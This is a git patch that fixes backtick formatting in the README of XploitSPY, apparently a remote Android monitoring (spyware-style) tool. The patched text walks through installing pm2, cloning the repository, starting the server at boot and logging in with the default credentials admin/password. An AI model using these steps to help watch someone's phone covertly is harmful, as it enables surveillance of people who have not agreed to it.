From b967774c1610e26d951bb0e16f9f1035528bdfb8 Mon Sep 17 00:00:00 2001 From: MAHESH KUMAR <59735191+RaoMK@users.noreply.github.com> Date: Wed, 13 Jan 2021 21:33:44 +0530 Subject: [PATCH] Update README.md --- README.md | 12 ++++++------ 1 file changed, 6 insertions(+), 6 deletions(-) diff --git a/README.md b/README.md index de4fdf9..b50b8bc 100644 --- a/README.md +++ b/README.md @@ -49,23 +49,23 @@ A cloud based Android Monitoring Tool, powered by NodeJS - `sudo npm install pm2 -g` 4. Clone the repo - - `git clone https://github.com/XploitWizer/XploitSPY.git + - `git clone https://github.com/XploitWizer/XploitSPY.git` 5. Go to server directory - - `cd XploitSPY/server/ + - `cd XploitSPY/server/` 5. In the server directory, run these commands - `npm install` <- install dependencies - `pm2 start index.js` <-- start the script - `pm2 startup` <- to run XploitSPY on startup -6. Find your public IP ` curl ifconfig.me +6. Find your public IP `curl ifconfig.me` -7. In your browser navigate to your Server Static IP Address` Ex.: http://192.168.55.203 +7. In your browser navigate to your Server Static IP Address` Ex.: http://192.168.55.203` 8. Login details - - `Username : admin - - `Password : password + - `Username : admin` + - `Password : password` It's recommended to run XploitSPY behind a reverse proxy such as [NGINX](https://www.nginx.com/resources/wiki/start/topics/tutorials/install/)